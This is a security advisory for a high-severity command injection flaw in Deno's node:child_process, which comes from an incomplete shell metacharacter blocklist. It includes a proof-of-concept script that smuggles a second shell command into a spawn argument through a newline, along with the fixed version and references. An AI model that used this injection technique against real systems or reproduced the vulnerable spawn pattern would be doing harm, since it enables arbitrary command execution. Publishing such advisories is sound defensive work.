JLSEC-2026-116 High 8.1
Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
Summary
A command injection vulnerability exists in Deno's node:child_process implementation.
Reproduction
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));Run: deno run --allow-all poc.mjs
The file /tmp/rce_proof is created, confirming arbitrary command execution.
Mitigation
All users need to update to the patched version (Deno v2.6.8).
References
- https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c
- https://github.com/denoland/deno/releases/tag/v2.6.8
- https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr
- https://nvd.nist.gov/vuln/detail/CVE-2026-27190
- https://github.com/advisories/GHSA-hmh4-3xvx-q5hr